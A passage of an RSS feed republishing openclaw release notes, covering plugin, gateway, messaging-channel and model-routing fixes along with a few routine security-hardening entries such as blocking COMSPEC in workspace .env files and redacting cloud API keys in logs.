<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</li>
<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</li>
<li>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</li>
<li>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</li>
<li>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</li>
<li>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</li>
<li>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</li>
<li>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</li>
<li>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</li>
<li>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</li>
<li>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</li>
<li>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</li>
<li>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</li>
<li>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</li>
<li>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</li>
<li>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.3]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</guid>
<pubDate>Sun, 03 May 2026 00:16:39 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
